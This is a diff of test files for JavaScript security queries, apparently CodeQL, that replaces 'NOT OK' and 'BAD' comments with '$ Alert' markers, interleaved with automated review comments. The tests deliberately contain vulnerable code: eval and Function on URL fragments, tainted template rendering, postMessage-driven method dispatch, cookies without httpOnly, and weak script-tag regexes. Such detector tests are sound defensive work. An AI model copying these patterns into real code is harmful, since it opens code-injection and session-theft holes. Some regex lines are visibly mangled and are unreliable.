Alert[js/code-injection] + jade.render(tainted); // $ Alert[js/code-injection] + dot.template(tainted); // $ Alert[js/code-injection] + ejs.render(tainted); // $ Alert[js/code-injection] + nunjucks.renderString(tainted); // $ Alert[js/code-injection] + lodash.template(tainted); // $ Alert[js/code-injection] + dot.compile(tainted); // $ Alert[js/code-injection] + handlebars.compile(tainted); // $ Alert[js/code-injection] + mustache.render(tainted); // $ Alert[js/code-injection] + Hogan.compile(tainted); // $ Alert[js/code-injection] + Eta.render(tainted); // $ Alert[js/code-injection] + Sqrl.render(tainted); // $ Alert[js/code-injection] }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js index 5b51da5daf26..f2ef50335647 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js @@ -1,38 +1,31 @@ -// NOT OK -eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) +eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) // $ Alert[js/code-injection] + +setTimeout(document.location.hash); // $ Alert[js/code-injection] -// NOT OK -setTimeout(document.location.hash); -// OK setTimeout(document.location.protocol); -// OK + $('. ' + document.location.hostname); -// NOT OK -Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); +Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); // $ Alert[js/code-injection] -// NOT OK -WebAssembly.compile(document.location.hash); +WebAssembly.compile(document.location.hash); // $ Alert[js/code-injection] -// NOT OK -WebAssembly.compileStreaming(document.location.hash); +WebAssembly.compileStreaming(document.location.hash); // $ Alert[js/code-injection] -// NOT OK -eval(atob(document.location.hash.substring(1))); +eval(atob(document.location.hash.substring(1))); // $ Alert[js/code-injection] -// NOT OK -$('
    ').attr("onclick", location.search.substring(1)); +$('').attr("onclick", location.search.substring(1)); // $ Alert[js/code-injection] (function test() { - var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); + var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); // $ Source[js/code-injection] - new Function(source); // NOT OK + new Function(source); // $ Alert[js/code-injection] - Function(source); // NOT OK + Function(source); // $ Alert[js/code-injection] - new Function("a", "b", source); // NOT OK + new Function("a", "b", source); // $ Alert[js/code-injection] - new Function(...["a", "b"], source); // NOT OK + new Function(...["a", "b"], source); // $ Alert[js/code-injection] })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html index 3f62fd326211..1d2014837d27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html @@ -1,6 +1,6 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js index 00fb98af9675..e9cb0a8b755c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js 
@@ -1,5 +1,5 @@ import * as webix from 'webix'; -webix.exec(document.location.hash); // NOT OK -webix.ui({ template: document.location.hash }); // NOT OK -webix.ui({ template: function () { return document.location.hash } }); // NOT OK \ No newline at end of file +webix.exec(document.location.hash); // $ Alert[js/code-injection] +webix.ui({ template: document.location.hash }); // $ Alert[js/code-injection] +webix.ui({ template: function () { return document.location.hash } }); // $ Alert[js/code-injection] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref index edaea6fbb219..dd00277b79b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref @@ -1 +1 @@ -Security/CWE-094/ExpressionInjection.ql +query: Security/CWE-094/ExpressionInjection.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected index 8511b6bcaf69..bddb28457097 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected 
@@ -1,3 +1,10 @@ +#select +| example.js:13:5:13:24 | window[message.name] | example.js:9:37:9:38 | ev | example.js:13:5:13:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | example.js:9:37:9:38 | ev | user-controlled value | +| tst.js:5:5:5:24 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:5:5:5:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:6:9:6:28 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:6:9:6:28 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:11:5:11:19 | f[message.name] | tst.js:3:37:3:38 | ev | tst.js:11:5:11:19 | f[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:15:5:15:14 | window[ev] | tst.js:3:37:3:38 | ev | tst.js:15:5:15:14 | window[ev] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:21:5:21:29 | window[ ... e.name] | tst.js:3:37:3:38 | ev | tst.js:21:5:21:29 | window[ ... e.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | edges | example.js:9:37:9:38 | ev | example.js:10:30:10:31 | ev | provenance | | | example.js:10:9:10:37 | message | example.js:13:12:13:18 | message | provenance | | 
@@ -55,10 +62,3 @@ nodes | tst.js:21:17:21:23 | message | semmle.label | message | | tst.js:21:17:21:28 | message.name | semmle.label | message.name | subpaths -#select -| example.js:13:5:13:24 | window[message.name] | example.js:9:37:9:38 | ev | example.js:13:5:13:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | example.js:9:37:9:38 | ev | user-controlled value | -| tst.js:5:5:5:24 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:5:5:5:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:6:9:6:28 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:6:9:6:28 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:11:5:11:19 | f[message.name] | tst.js:3:37:3:38 | ev | tst.js:11:5:11:19 | f[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:15:5:15:14 | window[ev] | tst.js:3:37:3:38 | ev | tst.js:15:5:15:14 | window[ev] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:21:5:21:29 | window[ ... e.name] | tst.js:3:37:3:38 | ev | tst.js:21:5:21:29 | window[ ... e.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref index 5c4a993df5a7..15581f63a99c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref 
+++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref @@ -1 +1,2 @@ -Security/CWE-094/UnsafeDynamicMethodAccess.ql +query: Security/CWE-094/UnsafeDynamicMethodAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js index 8ffd5a8addda..e0be4ba3cb29 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js @@ -6,9 +6,9 @@ function pause(data) { // ... } -window.addEventListener("message", (ev) => { +window.addEventListener("message", (ev) => { // $ Source let message = JSON.parse(ev.data); // Let the parent frame call the 'play' or 'pause' function - window[message.name](message.payload); // NOT OK + window[message.name](message.payload); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js index 2119fa97ed23..632249037b21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js 
@@ -1,22 +1,22 @@ let obj = {}; -window.addEventListener('message', (ev) => { +window.addEventListener('message', (ev) => { // $ Source let message = JSON.parse(ev.data); - window[message.name](message.payload); // NOT OK - may invoke eval - new window[message.name](message.payload); // NOT OK - may invoke jQuery $ function or similar + window[message.name](message.payload); // $ Alert - may invoke eval + new window[message.name](message.payload); // $ Alert - may invoke jQuery $ function or similar window["HTMLElement" + message.name](message.payload); // OK - concatenation restricts choice of methods window[`HTMLElement${message.name}`](message.payload); // OK - concatenation restricts choice of methods function f() {} - f[message.name](message.payload)(); // NOT OK - may acccess Function constructor + f[message.name](message.payload)(); // $ Alert - may acccess Function constructor obj[message.name](message.payload); // OK - may crash, but no code execution involved - window[ev](ev); // NOT OK + window[ev](ev); // $ Alert window[configData() + ' ' + message.name](message.payload); // OK - concatenation restricts choice of methods window[configData() + message.name](message.payload); // OK - concatenation restricts choice of methods - window['' + message.name](message.payload); // NOT OK - coercion does not restrict choice of methods + window['' + message.name](message.payload); // $ Alert - coercion does not restrict choice of methods }); diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected index b8b29a028c25..f520dd88e972 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected +++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected 
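Review bot: The comment on the `f[message.name](message.payload)();` line carries the typo "acccess" over from the old `NOT OK` comment. As the line is rewritten anyway, it could read `// $ Alert - may access Function constructor`. The remaining markers in this hunk keep the old verdicts one-for-one (`NOT OK` becomes `$ Alert`, the `OK - concatenation restricts choice of methods` cases stay plain comments), so nothing else stands out.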
@@ -1,8 +1,8 @@ -| tst-httpOnly.js:11:9:15:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:11:9:15:2 | session ... alse\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:29:9:29:21 | session(sess) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:38:9:38:22 | session(sess2) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:47:9:47:22 | session(sess3) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:51:9:55:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:51:9:55:2 | session ... lag2\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:68:5:73:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:78:5:81:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:101:5:101:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | 
@@ -12,9 +12,9 @@ | tst-httpOnly.js:148:5:148:41 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:159:5:159:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:170:5:170:40 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:209:37:209:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:229:38:229:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:289:37:289:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:303:9:307:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:320:9:324:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:330:37:330:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:208:37:208:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:227:38:227:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:287:37:287:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:301:9:305:2 | session ... se }\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:318:9:322:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:328:37:328:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref index 683e1cd46985..85a4e780c1a9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref 
+++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref @@ -1 +1,2 @@ -Security/CWE-1004/ClientExposedCookie.ql +query: Security/CWE-1004/ClientExposedCookie.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js index b91f82c781f2..681b3e2382a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js +++ b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js @@ -5,19 +5,19 @@ const session = require('cookie-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: true, // GOOD + httpOnly: true, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: false // BAD -})) + httpOnly: false +})) // $ Alert app.use(session({ name: 'session', keys: ['key1', 'key2'], - secure: true // GOOD, httpOnly is true by default + secure: true // OK - httpOnly is true by default })) var sess = { @@ -26,7 +26,7 @@ var sess = { } sess.httpOnly = false; -app.use(session(sess)) // BAD +app.use(session(sess)) // $ Alert var sess2 = { name: 'session', @@ -35,7 +35,7 @@ var sess2 = { } sess2.httpOnly = false; -app.use(session(sess2)) // BAD +app.use(session(sess2)) // $ Alert var sess3 = { name: 'mycookie', @@ -44,21 +44,21 @@ var sess3 = { } sess3.httpOnly = false; -app.use(session(sess3)) // BAD, It is a session cookie, name doesn't matter +app.use(session(sess3)) // $ Alert - It is a session cookie, name doesn't matter var flag = false var flag2 = flag app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: flag2 // BAD -})) + httpOnly: flag2 +})) // $ Alert app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false }); res.end('ok') 
@@ -68,9 +68,9 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, secure: false - }); + }); // $ Alert res.end('ok') }) @@ -78,14 +78,14 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000 - }); - res.end('ok') // BAD + }); // $ Alert + res.end('ok') }) app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false } res.cookie('authkey', 'value', options); @@ -95,10 +95,10 @@ app.get('/a', function (req, res, next) { app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, secure: false } - res.cookie('authkey', 'value', options); + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -106,7 +106,7 @@ app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000 } - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -115,7 +115,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -124,7 +124,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -134,7 +134,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) 
@@ -145,7 +145,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let authKey = "blabla" - res.cookie(authKey, 'value', options); // BAD, var name likely auth related + res.cookie(authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -156,7 +156,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let o = { authKey: "blabla" } - res.cookie(o.authKey, 'value', options); // BAD, var name likely auth related + res.cookie(o.authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -167,7 +167,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let blabla = "authKey" - res.cookie(blabla, 'value', options); // BAD, var name likely auth related + res.cookie(blabla, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -177,7 +177,7 @@ app.get('/a', function (req, res, next) { httpOnly: true, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -187,7 +187,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -196,7 +196,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000, httpOnly: false, } - res.cookie('mycookie', 'value', options); // GOOD, name likely is not auth sensitive + res.cookie('mycookie', 'value', options); // OK - name likely is not auth sensitive res.end('ok') }) @@ -205,8 +205,7 @@ const http = require('http'); function test1() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", "authKey=ninja"); + res.setHeader("Set-Cookie", "authKey=ninja"); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); 
@@ -215,7 +214,7 @@ function test1() { function test2() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", "auth=ninja; HttpOnly"); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -225,8 +224,7 @@ function test2() { function test3() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); + res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -235,7 +233,7 @@ function test3() { function test4() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", ["auth=ninja; HttpOnly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -245,7 +243,7 @@ function test4() { function test5() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD, case insensitive + // OK - case insensitive res.setHeader("Set-Cookie", ["auth=ninja; httponly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -265,7 +263,7 @@ function test6() { function test7() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // Good, not auth related + // OK - not auth related res.setHeader("Set-Cookie", ["foo=ninja", "bar=javascript"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); 
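Review bot: In the `test2` and `test4` hunks the removed `// GOOD` line appears to be replaced by an empty or whitespace-only added line, since both hunk headers keep the line count at 7. That leaves a stray blank line inside the handler and drops the statement that these `Set-Cookie` values are the negative cases. Either delete the line outright, or keep the verdict in the form the `test5` hunk uses (`// OK - case insensitive`), for example `// OK - HttpOnly attribute is set`. The bodies of `test2` and `test4` continue outside their hunks.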
@@ -276,7 +274,7 @@ function test8() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; httponly" - res.setHeader("Set-Cookie", `session=ninja ${attr}`); // Good, httponly string expression + res.setHeader("Set-Cookie", `session=ninja ${attr}`); // OK - httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -286,7 +284,7 @@ function test9() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; secure" - res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // Bad, not httponly string expression + res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // $ Alert - not httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -297,22 +295,22 @@ const session = require('express-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: true }, // GOOD + cookie: { httpOnly: true }, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD -})) + cookie: { httpOnly: false } +})) // $ Alert app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { secure: true } // GOOD, httpOnly is true by default + cookie: { secure: true } // OK - httpOnly is true by default })) -app.use(session({ // GOOD, httpOnly is true by default +app.use(session({ // OK - httpOnly is true by default name: 'session', keys: ['key1', 'key2'] })) 
@@ -320,14 +318,14 @@ app.use(session({ // GOOD, httpOnly is true by default app.use(session({ name: 'mycookie', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD, It is a session cookie, name doesn't matter -})) + cookie: { httpOnly: false } // It is a session cookie, name doesn't matter +})) // $ Alert const http = require('http'); function test10() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // BAD + res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref index e5fc84fd48a9..443c007de0cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref @@ -1 +1,2 @@ -Security/CWE-116/BadTagFilter.ql +query: Security/CWE-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js index 5b294adae1b7..5fdc3b0c798e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js 
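Review bot: The explanation `// It is a session cookie, name doesn't matter` now sits on the `cookie: { httpOnly: false }` line while the `// $ Alert` marker is on the closing `}))`, so the reason is detached from the expectation it explains. The `sess3` case earlier in this file keeps both together as `// $ Alert - It is a session cookie, name doesn't matter`. For consistency the closing line here could read `})) // $ Alert - it is a session cookie, name doesn't matter`, with the option line left uncommented.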
@@ -1,25 +1,25 @@ var filters = [ - /.*?<\/script>/i, // NOT OK - doesn't match newlines or `` - /.*?<\/script>/is, // NOT OK - doesn't match `` - /.*?<\/script[^>]*>/is, // OK + /.*?<\/script>/i, // $ Alert - doesn't match newlines or `` + /.*?<\/script>/is, // $ Alert - doesn't match `` + /.*?<\/script[^>]*>/is, //is, // OK - we don't care regexps that only match comments - /)|([^\/\s>]+)[\S\s]*?>/, // NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // NOT OK - capture groups - /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // NOT OK - capture groups - /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // NOT OK - capture groups - /|<([^>]*?)>/g, // NOT OK - capture groups + /)|([^\/\s>]+)[\S\s]*?>/, // $ Alert - doesn't match comments with the right capture groups + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // $ Alert - capture groups + /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // $ Alert - capture groups + /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // $ Alert - capture groups + /|<([^>]*?)>/g, // $ Alert - capture groups ] doFilters(filters) 
@@ -28,8 +28,8 @@ var strip = ']*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used w new RegExp(strip, 'gi'); var moreFilters = [ - /-->/g, // NOT OK - doesn't match --!> - /^>|^->||--!>|/g, // $ Alert - doesn't match --!> + /^>|^->||--!>| repl[c]).replace(/&/g, "&"); + return s.replace(/["']/g, (c) => repl[c]).replace(/&/g, "&"); // $ Alert } // dubious, but out of scope for this query @@ -98,17 +98,17 @@ function encodeDecodeEncode(s) { function badEncode(s) { return s.replace(new RegExp("\"", "g"), """) .replace(new RegExp("\'", "g"), "'") - .replace(new RegExp("&", "g"), "&"); // NOT OK + .replace(new RegExp("&", "g"), "&"); // $ Alert } function goodEncode(s) { return s.replace(new RegExp("\"", ""), """) .replace(new RegExp("\'", ""), "'") - .replace(new RegExp("&", ""), "&"); // OK + .replace(new RegExp("&", ""), "&"); } function goodEncode(s) { return s.replace(new RegExp("\"", unknownFlags()), """) .replace(new RegExp("\'", unknownFlags()), "'") - .replace(new RegExp("&", unknownFlags()), "&"); // OK + .replace(new RegExp("&", unknownFlags()), "&"); } diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected index 7af957d720a1..162ff1c05993 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/IncompleteHtmlAttributeSanitization.expected 
